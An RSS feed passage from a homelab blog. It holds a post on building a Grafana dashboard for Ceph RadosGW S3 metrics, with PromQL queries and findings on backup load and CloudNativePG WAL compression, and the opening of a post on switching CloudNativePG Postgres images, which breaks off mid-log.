# HELP radosgw_usage_user_bucket_quota_size_bytes Maximum allowed size bytes size for each bucket of user
# TYPE radosgw_usage_user_bucket_quota_size_bytes gauge
radosgw_usage_user_bucket_quota_size_bytes{store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} 0.0
# HELP radosgw_usage_user_bucket_quota_size_objects Maximum allowed number of objects in each user bucket
# TYPE radosgw_usage_user_bucket_quota_size_objects gauge
radosgw_usage_user_bucket_quota_size_objects{store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} -1.0
# HELP radosgw_usage_user_total_objects Usage of objects by user
# TYPE radosgw_usage_user_total_objects gauge
radosgw_usage_user_total_objects{store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} 934.0
# HELP radosgw_usage_user_total_bytes Usage of bytes by user
# TYPE radosgw_usage_user_total_bytes gauge
radosgw_usage_user_total_bytes{store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} 1.0549248e+08
# HELP radosgw_usage_scrape_duration_seconds Ammount of time each scrape takes
# TYPE radosgw_usage_scrape_duration_seconds gauge
radosgw_usage_scrape_duration_seconds 2.390573501586914
</code></pre><p>I&rsquo;ve left only the data for my blog bucket in the scrape result. I do not know
what the <code>-</code> bucket in the ops related data represents, I&rsquo;m afraid.</p>
<h2 id="the-dashboard">The dashboard</h2>
<p>At the top of my dashboard, I&rsquo;ve got a few overall figures in Grafana stats
panels:
<figure>
    <img loading="lazy" src="stats-panels.png"
         alt="A screenshot of a number of Grafana panels. All of them are stats type panels. First is the number of users, currently thirty. Followed by the number of buckets at 27. The next panel shows the number of objects, currently 1.2 million, followed by the total number of operations in the interval, 306k in the example. Followed by the total bytes received and send in the interval, at 1.14 GB and 1.81 GB respectively."/> <figcaption>
            <p>The top of my dashboard, with a couple of overall figures on all S3 buckets.</p>
        </figcaption>
</figure>
</p>
<p>These are configured with the following PromQL queries:</p>
<ul>
<li><em>Number of Users:</em> <code>sum(count(radosgw_user_metadata) by (user))</code></li>
<li><em>Number of Buckets:</em> <code>sum(count(radosgw_usage_bucket_objects) by (bucket))</code></li>
<li><em>Number of Objects:</em> <code>sum(radosgw_usage_bucket_objects)</code></li>
<li><em>Total Ops in Interval:</em> <code>sum(increase(radosgw_usage_ops_total[$__range]))</code></li>
<li><em>Total bytes received in Interval:</em> <code>sum(increase(radosgw_usage_received_bytes_total[$__range]))</code></li>
<li><em>Total bytes sent in Interval:</em> <code>sum(increase(radosgw_usage_sent_bytes_total[$__range]))</code></li>
</ul>
<p>Next up are two panels on the operations the RGW executed in the interval. These
are basically the S3 endpoints that got hit. I decided to go with two time series
panels, one showing operations accumulated by type over all buckets, and the
other showing operations per bucket, accumulated over all types of operation.</p>
<figure>
    <img loading="lazy" src="ops-panels.png"
         alt="A screenshot of two Grafana panels. Both show operations per second. The first graph shows operations by type. The only plots really visible in the graph are those for the &#39;get_obj&#39; and &#39;list_bucket&#39; operations. The plot for the &#39;get_obj&#39; operation is relatively steady, oscillating around 10 ops/s, with very regular spikes up to about 38 ops/s every 30 minutes. The &#39;list_bucket&#39; plot shows a different pattern, with spots where it falls to zero, then shows three &#39;humps&#39; of 2.2 ops/s one after the other and finishing with a bigger and longer hump up to 4.2 ops/s. Then the same pattern repeats. None of the other operation types are high enough to be visible in the graph. The other graph shows the same time range, but this time, the operations are grouped by bucket, instead of type. It is immediately clear that the 30 minute spikes up to 38 ops/s are produced by the &#39;-&#39; and &#39;thanos&#39; buckets. Three buckets are producing the highest load, with the &#39;thanos&#39; bucket producing around five ops/s, the &#39;-&#39; bucket around 3.5 ops/s and the cnpg-backup 1.5 ops/s."/> <figcaption>
            <p>Plots for operations, showing the ops/s by type and by bucket.</p>
        </figcaption>
</figure>

<p>The per-operation plot is created with this PromQL query:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span><span style="color:#66d9ef">rate</span><span style="color:#f92672">(</span>radosgw_usage_ops_total[<span style="color:#e6db74">5m</span>]<span style="color:#f92672">))</span> <span style="color:#66d9ef">by</span> <span style="color:#f92672">(</span>category<span style="color:#f92672">)</span>
</span></span></code></pre></div><p>And the per-bucket plot with this one:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span><span style="color:#66d9ef">rate</span><span style="color:#f92672">(</span>radosgw_usage_ops_total[<span style="color:#e6db74">5m</span>]<span style="color:#f92672">))</span> <span style="color:#66d9ef">by</span> <span style="color:#f92672">(</span>bucket<span style="color:#f92672">)</span>
</span></span></code></pre></div><p>These two plots nicely show which apps produce the highest S3 load in my Homelab.
The highest load, with about 5 ops/s on average, is coming from Thanos. Meaning
my metrics gathering is the highest S3 user by operations in my Homelab. Surprising
exactly nobody, I assume. &#x1f605;
Next comes this weird <code>-</code> bucket, which I still cannot explain. But it might have
something to do with Thanos as well, as it seems to follow a similar pattern to
the Thanos bucket requests?
The final consistent user is the CloudNativePG backup, which produces about
1.5 ops/s.</p>
<p>It really should make me feel a bit queasy that the largest user of my S3 is
my metrics gathering. Yet somehow, I don&rsquo;t care even a bit. &#x1f601;</p>
<p>Next are the transmission plots, with bytes sent and received:
<figure>
    <img loading="lazy" src="bytes-overall.png"
         alt="Another screenshot of two Grafana time series plots. The first one shows bytes received, and the second one shows bytes send. Both show low average activity, with about 8 kB/s send and about 5 kB/s received.Both plots show a few relatively short peaks, with bytes send going up to about 1.75 MB/s and bytes received peaking at about 1 MB/s."/> <figcaption>
            <p>Plots for bytes sent and received by the RGWs overall.</p>
        </figcaption>
</figure>

Overall, a pretty low average activity, with spikes going up no higher than
1.75 MB/s.</p>
<p>The plots are produced with these PromQL queries, starting with the &ldquo;Bytes sent&rdquo;
plot:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span><span style="color:#66d9ef">rate</span><span style="color:#f92672">(</span>radosgw_usage_sent_bytes_total[<span style="color:#e6db74">5m</span>]<span style="color:#f92672">))</span>
</span></span></code></pre></div><p>And the &ldquo;Bytes received&rdquo; plot:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span><span style="color:#66d9ef">rate</span><span style="color:#f92672">(</span>radosgw_usage_received_bytes_total[<span style="color:#e6db74">5m</span>]<span style="color:#f92672">))</span>
</span></span></code></pre></div><p>Then I&rsquo;ve got the same plots, but now grouped by buckets receiving/sending the
bytes:
<figure>
    <img loading="lazy" src="bytes-by-bucket.png"
         alt="A screenshot of two Grafana time series plots. They show bytes send and received by bucket. Similar to the previous two plots, most of the time almost no traffic appears. But what these plots reveal is that most of the spikes in the previous bytes send plot came from the Thanos bucket. Similarly, the bytes received came from the Thanos bucket, but also the Harbor bucket. Similar to the previous plot, the spikes are still pretty low, around 1.75 MB/s for sending and 1 MB/s for receiving."/> <figcaption>
            <p>Plots for bytes sent and received, this time accumulated by bucket.</p>
        </figcaption>
</figure>

These plots show a similar picture to the previous ones, but allow me to see which
bucket produced the most load. The thing to note here is that while the spikes for
bytes sent came from the Thanos bucket, the spikes in the bytes received plot
came from a mix of the Thanos bucket and the Harbor bucket. That&rsquo;s most likely
because I was working on some container images during the period the panels show.</p>
<p>Both of the above plots were produced similarly to the previous combined plots,
just with an additional <code>by</code> clause:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#75715e"># Bytes send</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span><span style="color:#66d9ef">rate</span><span style="color:#f92672">(</span>radosgw_usage_sent_bytes_total[<span style="color:#e6db74">5m</span>]<span style="color:#f92672">))</span> <span style="color:#66d9ef">by</span> <span style="color:#f92672">(</span>bucket<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Bytes received</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span><span style="color:#66d9ef">rate</span><span style="color:#f92672">(</span>radosgw_usage_received_bytes_total[<span style="color:#e6db74">5m</span>]<span style="color:#f92672">))</span> <span style="color:#66d9ef">by</span> <span style="color:#f92672">(</span>bucket<span style="color:#f92672">)</span>
</span></span></code></pre></div><p>The next two plots are showing the size of the buckets over time, both in bytes
and in objects:
<figure>
    <img loading="lazy" src="size-panels.png"
         alt="A screenshot of two more Grafana time series plots. This time, they&#39;re stacked area plots. The first one shows the sizes of buckets in bytes. The overall size being about 1.6 TB. The plot does not change at all over the 6 hour window shown in the screenshot. There are two significant bands for the two largest buckets, the CNPG backup bucket and the Thanos bucket. The second plot shows the number of objects in each bucket. That also shows two large bands, but this time they&#39;re different buckets which are the largest, namely my Loki logs bucket and the bucket of my Mastodon instance. Similar to the previous plot, the object counts plot also doesn&#39;t change visibly during the 6 hour window shown in the screenshot."/> <figcaption>
            <p>Plots for the size of my buckets, both in bytes and number of objects.</p>
        </figcaption>
</figure>

The setup for these plots was a bit more elaborate, because I wanted them to be
stacked area charts, so I could see the relative sizes of my buckets easily and
also see larger changes.
Their PromQL looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#75715e"># Usage in bytes</span>
</span></span><span style="display:flex;"><span>radosgw_usage_bucket_bytes
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Number of objects</span>
</span></span><span style="display:flex;"><span>radosgw_usage_bucket_objects
</span></span></code></pre></div><p>Exciting, right? &#x1f609;</p>
<p>The &ldquo;area chart&rdquo; look can be controlled by the &ldquo;Fill opacity&rdquo; in the &ldquo;Graph styles&rdquo;
section of the chart&rsquo;s configuration, and stacking can be enabled by setting
&ldquo;Stack series&rdquo; to &ldquo;normal&rdquo; in that same section.</p>
<p>Last, but certainly not least, here are some bar charts with the latest sizes of
my largest buckets:
<figure>
    <img loading="lazy" src="sizes-bar.png"
         alt="And yet another screenshot of two Grafana panels. These charts are both bar charts, each bar representing one of my S3 buckets. The first chart contains the size in bytes, the other one the number of objects. The top five buckets by size in bytes are: backup-cnpg with 588 GB, thanos with 442 GB, harbor with 130 GB, backup-audiobookshelf with 80.1 GB and backup-amun with 76.5 GB. The first five buckets by number of objects are almost entirely different. The top bucket, with 431k objects is my logs S3 bucket, followed by Mastodon with 411k, bookwyrm with 247k, then backupcnpg with a mere 30.3k and finally the harbor bucket with 26.6k. At the very end, the smallest bucket by size in bytes is the Mastodon backup bucket, at 406 MB, and the backup-postgres bucket with 280 objects at the bottom of the total number of objects chart."/> <figcaption>
            <p>Plots showing bar charts with the newest values for size in bytes and number of objects.</p>
        </figcaption>
</figure>

The first thing to note is how backup-cnpg and thanos dominate the chart by size
in bytes, and logs, mastodon and bookwyrm the chart by number of objects. I will
talk a bit more about backup-cnpg in the next section. The Thanos size is also
expected. I like my metrics, and I like to keep my metrics for extended periods
of time, and I&rsquo;m willing to spend a lot of space on that.</p>
<p>On the number of objects side of things, I was a bit surprised to see that the
top three are completely different from the size in bytes top three. But it does
make sense, although I plan to look into Loki&rsquo;s configuration a bit, since there
has to be a lot of overhead involved in producing that many objects. Mastodon is not
surprising at all, it just produces a lot of small objects in its cache. I was
a bit surprised by Bookwyrm though, as that one just doesn&rsquo;t have a large bunch of
user-generated media to cache.</p>
<p>Finally, the PromQL for the two plots:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#75715e"># Size in bytes plot</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">sort_desc</span><span style="color:#f92672">(</span>radosgw_usage_bucket_bytes<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Size in bytes plot</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">sort_desc</span><span style="color:#f92672">(</span>radosgw_usage_bucket_objects<span style="color:#f92672">)</span>
</span></span></code></pre></div><h2 id="a-bit-of-analysis">A bit of analysis</h2>
<p>Now that the dashboard has been described in the excruciating detail my readers
love and expect, let&rsquo;s turn to getting a bit more out of it than just &ldquo;uuuuh, look at those pretty charts!&rdquo;.</p>
<p>The first interesting result is related to my nightly backups. As a reminder,
I&rsquo;m using <a href="https://restic.net/">restic</a> to push the content of my volumes into
the Ceph S3 buckets, with one bucket per app. After that&rsquo;s done for all of my
apps, I&rsquo;m copying some of those buckets onto an external HDD. I&rsquo;m currently
lacking a third, offsite backup. If you&rsquo;re interested in more details, have a
look at <a href="https://blog.mei-home.net/posts/k8s-migration-14-backup-operator/">this post</a>.</p>
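<p>Just to illustrate the shape of those backups (the actual runs are driven by the
backup tooling described in the linked post, so endpoint, paths and credentials here
are placeholders, not my real configuration):</p>
<pre tabindex="0"><code># Hypothetical example: push one app volume into its own RGW S3 bucket with restic
export AWS_ACCESS_KEY_ID=placeholder-access-key
export AWS_SECRET_ACCESS_KEY=placeholder-secret-key
export RESTIC_PASSWORD=placeholder-repo-password

restic -r s3:https://s3.example.com/backup-audiobookshelf backup /mnt/volumes/audiobookshelf
</code></pre>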
<p>I&rsquo;ve now found that I&rsquo;m not bandwidth-limited but operations-limited, or at
least that&rsquo;s the way it looks.
<figure>
    <img loading="lazy" src="backups-ops.png"
         alt="A screenshot of two Grafana time series charts next to each other. The left one shows the overall ops in the RGW cluster. At the beginning of the plot, it shows below 10 ops/s, mostly get_obj. Then shortly after 03:30, the ops/s shoot up to over 350, all of it get_obj. The load stays that high for about 20 minutes, until it goes back to the previous level around 03:50. Then there&#39;s another spike at around 04:30. It also consists mostly of get_obj operations and spikes at about 310 ops/s. It is a lot shorter too, by 04:40 the ops/s have returned to below ten. The second chart then shows clearly where the ops load is coming from. During the initial, 03:30 phase, the overwhelming majority of it is from the bookwyrm bucket. The second spike at 04:30 is a lot more varied. The highest bucket is backup-cnpg, with a max of 170 ops/s, while e.g. backup-nextcloud spikes at 60 ops/s, backup-audiobookshelf at 26 ops/s and backup-paperless at 3.18 ops/s."/> <figcaption>
            <p>Operations during my backup phase.</p>
        </figcaption>
</figure>

My backup from the volumes to the S3 buckets happens at 03:30. Here, the Bookwyrm
backup seems to produce the overwhelming majority of the operations. This makes
sense if you scroll back up a bit and look at the bar chart with the objects per
bucket: the Bookwyrm bucket has a total of 247k objects. Sure, the log bucket has a lot more,
but it&rsquo;s not part of the backup at all. And while Mastodon also has a lot of
objects, those are mostly under the cache prefix, which gets ignored during the
backup. But I&rsquo;ve had a look at the Bookwyrm S3 bucket, and I couldn&rsquo;t identify
anything that looked like a pure cache. I will need to dig a bit deeper and
perhaps ask the devs whether there&rsquo;s some part of the bucket I can ignore for
the backups.</p>
<p>The second, more balanced spike around 04:30 is my external backup. Here I&rsquo;m
copying some of the backup buckets onto an external HDD, treating that as a
separate &ldquo;medium&rdquo;.</p>
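<p>Conceptually, that external copy is just a bucket-to-disk sync. As a sketch,
with s3cmd and a placeholder mount point (my actual tooling differs a bit):</p>
<pre tabindex="0"><code># Mirror a backup bucket onto the external HDD (placeholder paths)
s3cmd sync s3://backup-nextcloud/ /mnt/external-hdd/backup-nextcloud/
</code></pre>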
<p>During the same period, the actual number of bytes sent and received was pretty
low:
<figure>
    <img loading="lazy" src="backups-bytes.png"
         alt="You will likely have guessed it at this point: Another screenshot of two Grafana time series charts next to each other. These two show the incoming and outgoing bytes for the overall RGW cluster. On the sending side, there is one relatively short spike of about 8 minutes around 03:30 up to 6 MB/s, with another smaller one of three minutes up to 2 MB/s around 03:50. Then there&#39;s another large spike at 04:30, boing up to 8 MB/s and lasting for another about eight minutes. On the receiving side of things, there&#39;s a long span of around 750 kB/s to 1.25 MB/s from 03:30 to 03:55. There is notably no load at 04:30."/> <figcaption>
            <p>Bytes sent and received during my backups.</p>
        </figcaption>
</figure>

It is interesting that in these transmission charts, the load around the Bookwyrm
backup only shows up on the receiving side, and even then at a relatively low level.
Looking back at the ops charts, the majority of operations were get_obj, so I&rsquo;d
expect a consistent load on the sending side. But here, the load seems to mostly
be on the receiving side of things?
The explanation is that the bytes-received spike around 03:30 is not the Bookwyrm
bucket at all, but rather the CNPG backup bucket. 03:30 is not just when my normal
backups run, but also when CNPG takes its database base backups, hence the load.</p>
<p>Another thing worth mentioning is the total lack of any receiving activity around
the time of my external backup, 04:30. That&rsquo;s most likely due to the nature of
that backup, as it&rsquo;s only downloading the content of the backup buckets, but not
uploading anything.</p>
<p>The last thing I&rsquo;d like to bring up is the CloudNativePG backup bucket. I was
honestly pretty surprised that it&rsquo;s this big, at over 600 GB by the time I looked
at the charts for the first time. So I went spelunking a little bit and found
pretty quickly that it&rsquo;s the Write Ahead Log (WAL). For example, my Bookwyrm DB
backup looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>s3cmd du -H <span style="color:#e6db74">&#34;s3://backup-cnpg/bookwyrm-pg-cluster/wals/&#34;</span>
</span></span><span style="display:flex;"><span>94G    <span style="color:#ae81ff">6079</span> objects s3://backup-cnpg/bookwyrm-pg-cluster/wals/
</span></span><span style="display:flex;"><span>s3cmd du -H <span style="color:#e6db74">&#34;s3://backup-cnpg/bookwyrm-pg-cluster/base/&#34;</span>
</span></span><span style="display:flex;"><span> 3G      <span style="color:#ae81ff">62</span> objects s3://backup-cnpg/bookwyrm-pg-cluster/base/
</span></span></code></pre></div><p>The way CloudNativePG&rsquo;s backups work is that it continuously writes the WALs to
the backup bucket and takes a full base backup of the database files at configurable
points in time. I took the above example output at the beginning of October, when
Bookwyrm had been running for barely a month, and I already had 94 GB of WALs in the
backup. Sure, the system is great, as it allows me to restore to any point in
time. But to be honest, I don&rsquo;t really need that kind of granularity; a nightly
backup would be fine for me. Sadly, that&rsquo;s not something configurable, at
least as far as I could see.</p>
<p>So looking around, I found that I could enable compression for the WALs before
they get uploaded to the bucket, see the docs <a href="https://cloudnative-pg.io/plugin-barman-cloud/docs/compression/">here</a>.</p>
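<p>For reference, enabling it is a one-line change. The following is only a sketch
from memory of what that looks like with the Barman Cloud plugin&rsquo;s ObjectStore
resource; the resource name and namespace are placeholders, and the exact field
path should be double-checked against the linked docs:</p>
<pre tabindex="0"><code># Assumed field path: spec.configuration.wal.compression on the ObjectStore CR
kubectl patch objectstores.barmancloud.cnpg.io backup-store -n cnpg-system \
  --type merge -p '{"spec":{"configuration":{"wal":{"compression":"bzip2"}}}}'
</code></pre>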
<p>And that brought quite some improvement. Here is an example from the Mastodon backups:</p>
<pre tabindex="0"><code>2025-10-04 16:36    16M  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F300000098
2025-10-04 16:41    16M  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F300000099
2025-10-04 16:46    16M  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F30000009A
2025-10-04 16:51    16M  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F30000009B
2025-10-04 16:56   248K  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F30000009C.bz2
2025-10-04 17:01   795K  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F30000009D.bz2
2025-10-04 17:06   308K  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F30000009E.bz2
2025-10-04 17:11   377K  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F30000009F.bz2
2025-10-04 17:16   831K  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F3000000A0.bz2
2025-10-04 17:21   421K  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F3000000A1.bz2
2025-10-04 17:26  1172K  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F3000000A2.bz2
</code></pre><p>Other databases of course don&rsquo;t produce remotely this many WALs, as there&rsquo;s nothing
as active as Mastodon in my Homelab. But the improvement is rather clear. I
opted for bzip2 compression, and it reduced the per-WAL size from a pretty consistent
16 MB to mostly below 1 MB. This is quite amazing. And there doesn&rsquo;t seem to be
any cost on the computational side, judging by the CPU utilization
of the barman cloud plugin containers running next to each Postgres container:
<figure>
    <img loading="lazy" src="barman-cloud-cpu.png"
         alt="A screenshot of a Grafana time series chart. This time, it shows the CPU utilization of the plugin-barman-cloud container in my k8s cluster. It&#39;s a very noisy plot, which wildly oscillates between 0 utilization and 1.4 to 3.6. Notably, even through its noisiness, it is relatively stable, and importantly doesn&#39;t show any change in characteristics around 19:00."/> <figcaption>
            <p>CPU utilization of the plugin-barman-cloud container, which is a sidecar to each CNPG postgres container.</p>
        </figcaption>
</figure>

It&rsquo;s a bit noisy, sure, but I switched most of my CNPG Postgres clusters over to
using compression during the evening, and as you can see, there was no increase
in CPU utilization at all.</p>
<p>And if you&rsquo;re curious, at the time of writing, I&rsquo;m down to 505 GB for the CNPG
backup bucket, from over 600 GB.</p>
<p>But the reduction in storage utilization wasn&rsquo;t the only effect. It also reduced
the load on the RGW cluster. These are the bytes received for the evening I
switched over to compression for the WAL backups:
<figure>
    <img loading="lazy" src="cnpg-reduction.png"
         alt="A screenshot of two Grafana time series charts. But this time, one above the other instead of next to each other. Switching things up a bit. :-D Both plots show the same story: For most of the cumulative bytes received plot, there was a persistent stream of about 280 kB/s. This abruptly ends at around 19:30. From that point, the load is at around 1.1 kB/s, besides the occasional spikes. The other chart shows the bytes received by bucket, and here it&#39;s clear that the persistent 280 kB/s came purely from the CNPG backup bucket."/> <figcaption>
            <p>Bytes received for the RGW cluster, with me switching my CNPG clusters over to compressed WAL backups at around 19:00.</p>
        </figcaption>
</figure>
</p>
<p>From a base load of about 280 kB/s down to a mere ~1.1 kB/s. Quite a nice reduction
in resource usage.</p>
<p>And that&rsquo;s it, folks. I hope you will forgive me for geeking out over metrics and
that you were able to enjoy the pretty charts.</p>
<p>(yes, about halfway through this post, I finally realized that &ldquo;chart&rdquo;,
not &ldquo;plot&rdquo; or &ldquo;graph&rdquo;, was the word I was looking for. &#x1f605;)</p>
]]></content:encoded>
    </item>
    <item>
      <title>Updating CloudNativePG Postgres Images</title>
      <link>https://blog.mei-home.net/posts/cnpg-image-updates/</link>
      <pubDate>Wed, 01 Oct 2025 22:40:58 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/cnpg-image-updates/</guid>
      <description>Switching the CloudNativePG Postgres image from the old variant to the new one using Debian as the base</description>
      <content:encoded><![CDATA[<p>In the interest of paying down a bit of technical debt in the Homelab, I
recently started to update the <a href="https://cloudnative-pg.io/">CloudNativePG</a> Postgres
images to their new variants.</p>
<p>Where before, the Postgres operand images (see the <a href="https://github.com/cloudnative-pg/postgres-containers">GitHub repo</a>)
were based on the official Postgres containers, they&rsquo;re now based on Debian and
the Debian Postgres packages.</p>
<p>With this switch, instead of just having one image per Postgres version, there
are now a few variants:</p>
<ul>
<li>Minimal: These images only contain what&rsquo;s necessary to run a CNPG Postgres instance</li>
<li>Standard: These images come with everything minimal contains, plus a few addons like PGAudit</li>
<li>System: These images are deprecated, and they are equivalent to the old image before
switching to Debian, including the Barman Cloud Plugin</li>
</ul>
<p>My main goal with this action was to switch away from the old images/system images,
as they were deprecated and will go away at some point.</p>
<p>Before I start in on how it went, one thing to mention is that it would have
been nice if there had been some information available about upgrading from one
image type to another. It turns out that switching from the legacy image to the
standard image works out of the box - but the docs never said anything to that
effect anywhere.
Initially, there was even a note in the Readme stating that a switch was not
possible, but <a href="https://github.com/cloudnative-pg/postgres-containers/commit/fdc8010750dc61d2fae3e695b9dc1103978cb14f#diff-b335630551682c19a781afebcf4d07bf978fb1f8ac04c6bf87428ed5106870f5">this commit</a>
removed it.</p>
<p>To test what really works and what doesn&rsquo;t, I started out with the database cluster
for my Wallabag deployment. That&rsquo;s currently the tool in the Homelab I could live
with being down for a few days if the entire action went south.</p>
<p>As the first step, I needed to decide which precise variant of the new CNPG Postgres
images I actually wanted to use. The most important check here was to ensure that
&ldquo;bullseye&rdquo; was actually the right OS version, by running this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl exec -it -n wallabag wallabag-pg-cluster-1 -- cat /etc/os-release
</span></span></code></pre></div><p>That confirmed that the old images were based on Debian bullseye. Because the
DB was using Postgres 17.2, I tried to use <code>17.2-standard-bullseye</code>. This did not
work, and I got an image not found error. Checking a bit further, I first got
pretty annoyed with GitHub&rsquo;s package page. And I&rsquo;m honestly wondering whether
I&rsquo;m doing something wrong, because I just can&rsquo;t seem to figure out how to
search in the tags of the <a href="https://github.com/cloudnative-pg/postgres-containers/pkgs/container/postgresql">CNPG postgres-container image repo</a>.
But luckily, CNPG itself provides image lists, for example <a href="https://github.com/cloudnative-pg/artifacts/tree/main/image-catalogs">here</a>.
From that, I was able to see that the newest Postgres 17 image was 17.6, so
I entered that into my Wallabag Helm chart&rsquo;s Cluster:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wallabag-pg-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">imageName</span>: <span style="color:#e6db74">&#34;ghcr.io/cloudnative-pg/postgresql:17.6-standard-bullseye&#34;</span>
</span></span></code></pre></div><p>After a <code>helm upgrade</code> on my chart, the CNPG operator automatically switched first
the replica and then the primary over to the new image, seemingly without any
issue at all.</p>
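<p>For anyone wanting to watch along during such a switch: assuming the cnpg
kubectl plugin is installed, something like this shows the rollout progressing
(namespace and cluster name taken from my example above):</p>
<pre tabindex="0"><code># Watch the instance Pods being replaced one by one
kubectl get pods -n wallabag -w

# The cnpg plugin shows the current image and the role of each instance
kubectl cnpg status wallabag-pg-cluster -n wallabag
</code></pre>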
<p>I decided to stay with bullseye for now to not do too many things at once.
Updating the OS to trixie will come in a follow-up task.</p>
<p>Then came the Harbor update, and that went utterly horribly.</p>
<p>Harbor was one of the first services I set up back when I started my migration
to k8s, as I didn&rsquo;t have it running on my Nomad-based Homelab. So it was still
on Postgres <code>16.2</code>. The first step was switching it to the new images, but still
using Postgres 16. My thinking was that it was probably a good idea to not
combine a switch of the image type with a major Postgres update. This update
went swimmingly, without any issues at all.</p>
<p>Then I switched from <code>16.10</code> to <code>17.6</code>. Major updates are <a href="https://cloudnative-pg.io/documentation/1.27/postgres_upgrades/#major-version-upgrades">supported by CNPG</a> by just updating the <code>imageName</code> in the Cluster CRD.
These major updates work offline, so the application will not be able to access
the database while the update is ongoing, which didn&rsquo;t bother me too much.</p>
<p>Initially, it looked like everything was fine. CNPG launches a major upgrade
Kubernetes Job and updates the replica(s) in the cluster first. This went through
without issue again. The problems started when CNPG tried to launch the replica,
which is seemingly always a fresh one. The Pod of the new replica never achieved
Running state, repeatedly getting restarted after a while.</p>
<p>First of all, I think the logging could be improved. Because multiple times
every second, the following message gets written to the Pod&rsquo;s logs:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">[...]</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;error_severity&#34;</span>:<span style="color:#e6db74">&#34;FATAL&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;sql_state_code&#34;</span>:<span style="color:#e6db74">&#34;57P03&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;message&#34;</span>:<span style="color:#e6db74">&#34;the database system is starting up&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">[...]</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This message just gets spammed, which made the actually informative log entries
difficult to spot.
Towards the end, I saw the following errors:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">[...]</span>
